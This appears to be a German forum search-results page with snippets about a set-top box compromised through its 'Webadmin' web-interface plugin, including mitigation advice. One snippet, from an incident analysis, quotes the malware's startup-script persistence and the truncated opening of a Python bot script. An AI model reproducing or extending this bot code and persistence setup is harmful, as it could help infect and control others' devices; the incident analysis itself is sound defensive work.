Suchergebnisse

Suchergebnisse 1-4 von insgesamt 4.

  • Kurze Info wie versprochen nach Analyse: Der Angriff erfolgte über das Internet über das Webinterface (nicht SSH oder Telnet), - und konkret über das darin eingebettet WebPlugin "Webadmin" Lösung um das hier beschriebene Problem zu verhindern: Optimal: Webinterface gar nicht erst über das Internet erreichbar machen. Benötigt man dies jedoch für private Zwecke, so sollte neben einem komplexen Passwort für den User "root" zusätzlich auch der externe TCP-Port so zu definieren sein, dass er nicht 80…

  • Zitat von Schnello: „Zitat: „Aber dann ist auch keine Analyse mehr möglich.“ Das ist zwar nett das du das machen möchtest aber geht der Selbstschutz nicht vor? (Und das bezieht sich nun auf dein gesamtes Netzwerk) Ich mein... würde in den nächsten Tagen ein SEK vor deiner Tür stehen und dich wegen Kinderp. Inhalten verhaften... würde es micht nicht wundern. Grüße“ Keine Sorge, ich bin kein Anfänger was IT betrifft und wie ich sagte .. die Box ist dicht und es wird alles im Detail geloggt. Analys…

  • Zitat von deepblue2000: „da hilft nur box neu flashen ! deine box ist mit einem virus/trojaner verseucht. wer weiss wo er noch überall drin steckt“ Aber dann ist auch keine Analyse mehr möglich. Die Box ist derzeit "dicht" - und es läuft ein Logging.. Sollte sich noch was rühren was nicht dem übliche bzw. gewünschtem Verhalten entspricht so werde ich die Ursache herausfinden. Nach einem neuflash weiss ich ja dann immer noch nicht ob möglicherweise ein genutztes Plugin /Extension vom Feed mit Sch…

  • kurze Analyse + Behebung

    Hammerhead - - Allgemeine Fragen

    Beitrag

    Nachdem ich auch von der Problematik betroffen war habe ich mir die Sache mal genauer angeschaut. Auf der Box fand sich in etc/rc3 S9990x.sh als LINK auf -> /0x/startup.sh im Ordner /0x die bereits im Thema genannten Daten startup.sh mit Inhalt #!/bin/sh /usr/bin/python /0x/0x.py 0x.py mit Inhalt import urllib2 import os,sys,time,base64,random done = 0 x = "" botversion = "__v0.1__" def sysstat(): os.system("uptime > /tmp/uptimestat") a = file("/tmp/uptimestat").readlines() uptime = a[0].replace…